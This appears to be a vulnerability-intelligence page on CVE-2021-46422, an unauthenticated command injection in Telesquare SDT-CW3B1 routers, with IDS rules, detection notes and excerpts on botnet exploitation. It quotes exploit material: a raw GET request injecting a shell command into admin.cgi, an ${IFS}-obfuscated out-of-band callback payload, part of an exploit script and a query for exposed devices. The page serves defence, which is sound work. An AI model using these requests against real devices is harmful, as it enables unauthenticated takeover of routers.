CVE-2021-46422
published 2022-04-27CVE-2021-46422: Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
94.75%
99.8th percentile
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| telesquare | sdt-cs3b1_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandping${IFS}-c${IFS}1${IFS}{{interactsh-url}}
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/admin.cgi?Command=sysCommand&Cmd="; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2021-46422; reference:url,twitter.com/momika233/status/1528742287072980992; classtype:attempted-admin; sid:2036663; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_05_23, cve CVE_2021_46422, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_26, reviewed_at 2024_09_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- →Exploit requires NO authentication. Any GET request to /cgi-bin/admin.cgi?Command=sysCommand&Cmd= should be treated as suspicious, especially from external/untrusted sources. ↗
- →The Snort/ET rule detects exploitation by matching the URI prefix /cgi-bin/admin.cgi?Command=sysCommand&Cmd= at the start of the HTTP URI, combined with the absence of a Referer header — flag GET requests matching this pattern with no Referer.
- →The exploit parses XML tag <CmdResult> from the CGI response to confirm command execution — defenders can monitor for this tag in HTTP responses from the device. ↗
- →Shodan query 'html:"SDT-CW3B1"' can be used to identify internet-exposed vulnerable devices for asset discovery and attack surface reduction.
- →IFS-substitution evasion technique (${IFS} in place of spaces) is used in the ping-based OOB detection payload — monitor for URL-encoded or literal ${IFS} in HTTP URIs targeting this endpoint.
- ·The Nuclei template uses an out-of-band (interactsh DNS callback) matcher to confirm exploitation. Detection based solely on HTTP response body may be unreliable as the template matches an empty body word.
- ·The ET Snort rule (sid:2036663) is classified with 'confidence Medium' — tune accordingly to reduce false positives in environments with legitimate CGI admin access.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8557-gh6f-6c42: Telesquare SDT-CW3B1 1
ghsa_unreviewed·2022-04-28
CVE-2021-46422 [CRITICAL] CWE-78 GHSA-8557-gh6f-6c42: Telesquare SDT-CW3B1 1
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
VulnCheck
telesquare sdt-cs3b1_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-46422 [CRITICAL] telesquare sdt-cs3b1_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
telesquare sdt-cs3b1_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Affected: telesquare sdt-cs3b1_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities; https://blog.netlab.360.com/new-ddos-botnet-wszeor/; https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/; https://for
Suricata
ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)
suricata·2022-05-23·CVSS 9.8
CVE-2021-46422 [CRITICAL] ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)
ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Telesquare SDT-CW3B1 1.1.0 - OS Command Injection (CVE-2021-46422)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/admin.cgi?Command=sysCommand&Cmd="; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2021-46422; reference:url,twitter.com/momika233/status/1528742287072980992; classtype:attempted-admin; sid:2036663; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_05_23, cve CVE_2021_46422, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Pr
Exploit-DB
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
exploitdb·2022-06-03·CVSS 9.8
CVE-2021-46422 [CRITICAL] Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
---
#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
import requests
import argparse
import sys
from xml.etree import ElementTree
def sysArgument():
ap = argparse.ArgumentParser()
ap.add_argument("--host", required=True, help="target hostname/IP")
args = vars(ap.parse_args())
return args['host']
def checkHost(host):
url = "http://" + host
print("[*] Checking host is it alive?")
try:
rsl = requests.get(url)
print("[*] The host is alive.")
except requests.exceptions.Timeout as err:
raise SystemExit(err)
def exploit(host):
url = "http://" + host + "/cg
Exploit-DB
SDT-CW3B1 1.1.0 - OS Command Injection
exploitdb·2022-05-17·CVSS 9.8
CVE-2021-46422 [CRITICAL] SDT-CW3B1 1.1.0 - OS Command Injection
SDT-CW3B1 1.1.0 - OS Command Injection
---
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows
# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Nuclei
SDT-CW3B1 1.1.0 - OS Command Injection
nuclei·CVSS 9.8
CVE-2021-46422 [CRITICAL] SDT-CW3B1 1.1.0 - OS Command Injection
SDT-CW3B1 1.1.0 - OS Command Injection
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Template:
id: CVE-2021-46422
info:
name: SDT-CW3B1 1.1.0 - OS Command Injection
author: badboycxcc,prajiteshsingh
severity: critical
description: |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: |
Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://www.exploit-db.
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Product
Description
CVE-2019-12725
Zeroshell Remote Command Execution Vulnerability
CVE-2019-17621
D-Link DIR-859 Remote Command Injection Vulnerability
CVE-2019-20500
D-Link DWL-2600AP Remote Command Execution Vulnerability
CVE-2021-25296
Nagios XI Remote Command Injection Vulnerability
CVE-2021-46422
Telesquare SDT-CW3B1 Router Command Injection Vulnerability
CVE-2022-27002
Arris TR3300 Remote Command Injection Vulnerability
CVE-2022-29303
SolarView Compact Command Injection Vulnerability
CVE-2022-30023
Tenda HG9 Router Command Injectio
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Threat Research Center
Trend Reports
Vulnerabilities
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.htmlhttp://packetstormsecurity.com/files/167387/Telesquare-SDT-CW3B1-1.1.0-Command-Injection.htmlhttps://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharinghttp://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.htmlhttp://packetstormsecurity.com/files/167387/Telesquare-SDT-CW3B1-1.1.0-Command-Injection.htmlhttps://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
2022-04-27
Published
Exploited in the wild